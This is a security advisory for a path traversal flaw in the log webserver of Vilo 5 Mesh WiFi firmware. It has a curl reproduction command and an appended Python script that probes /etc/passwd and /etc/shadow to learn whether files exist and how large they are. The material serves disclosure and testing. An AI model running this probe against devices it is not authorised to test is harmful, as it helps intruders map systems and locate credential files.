CVE-2024-40088: Arbitrary File Enumeration in Boa Webserver
- CVSS Score - 4.7, Medium (CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N)
- Affected Product - Vilo 5 Mesh WiFi System
- Affected Firmware - versions <= 5.16.1.33
- Overview - The custom TCP service listening on port 5432 exposes several functions, one of which starts a webserver stored at /hualai/boa/boa on port 8023. Because the TCP service has no authentication, anyone who can reach it can start the webserver. The webserver not only serves system logs to anyone with network access, but by placing path traversal sequences such as ../../ in the request path, the existence and size of any file on the device can be enumerated.
- Description
- The Boa webserver is designed to serve log files for the user to retrieve. The path in the HTTP request is processed by the server and checked to be an existing file relative to the /tmp directory, without first collapsing the ../ segments or confirming that the result still lies under /tmp. This means an HTTP request whose first line is GET /../../../etc/passwd makes the server check for the existence of /etc/passwd. The size of the file that was found is then used as the number of bytes of the log file to return to the client. - For example, if /../../../etc/passwd is supplied and /etc/passwd is exactly 27 bytes long, the first 27 bytes of the log file are returned. If the probed file is longer than the log file, the remainder of the response is null bytes (assuming nothing else is mapped in memory directly after the log buffer).
- Steps to Reproduce
- Run the command
curl https://192.168.58.1:8023/../../../../etc/passwd -k --path-as-is
and note that a 404 "Not Found" error is not returned, confirming that /etc/passwd exists (--path-as-is stops curl from collapsing the ../ segments before the request is sent).
- Run the command
- Impact - Anyone on the LAN can determine the existence and length of any file on the filesystem. Note that they cannot read the file contents.
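A small client that automates the reproduction step and the enumeration described under Impact. This is an added example, not code from the advisory or from Vilo: the host and port are taken from the curl command above, the names traversal_path, interpret_response and probe are chosen here, and the script assumes, as the Description states, that a 404 means the traversed path did not resolve to a file and that a 200 body is exactly as long as the probed file.

```python
import http.client
import ssl

# Taken from the advisory's reproduction command; the host is whatever address the
# Vilo node has on the LAN where the probe is run.
DEFAULT_HOST = "192.168.58.1"
DEFAULT_PORT = 8023


def traversal_path(target, depth=4):
    """Build the request-target the advisory uses: enough '../' segments to reach '/'
    from the /tmp log directory, then the absolute path of the file to probe."""
    return "/" + "../" * depth + target.lstrip("/")


def interpret_response(status, body):
    """Turn a raw response into (exists, size). A 404 means the traversed path did
    not resolve to a file; a 200 body is sized by the probed file, not by the log,
    so its length is the probed file's length (NUL padding included)."""
    if status == 404:
        return False, None
    if status == 200:
        return True, len(body)
    raise ValueError("unexpected status %d" % status)


def probe(target, host=DEFAULT_HOST, port=DEFAULT_PORT, timeout=5):
    """Send one traversal request and report whether the target exists and its size."""
    # Same trust decision as curl -k: the device certificate is not verified.
    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    conn = http.client.HTTPSConnection(host, port, timeout=timeout, context=ctx)
    # http.client sends the request-target verbatim, so the dot segments are not
    # collapsed on the client side (the equivalent of curl --path-as-is).
    conn.request("GET", traversal_path(target))
    resp = conn.getresponse()
    body = resp.read()
    conn.close()
    return interpret_response(resp.status, body)


if __name__ == "__main__":
    import sys
    targets = sys.argv[1:] or ["/etc/passwd", "/etc/shadow", "/does/not/exist"]
    for t in targets:
        exists, size = probe(t)
        if exists:
            print("%s: present, %d bytes" % (t, size))
        else:
            print("%s: absent" % t)
```

Run it with a list of paths to check; the output is only an existence-and-size oracle, matching the Impact section: the bytes that come back are the log (and NUL padding), not the probed file.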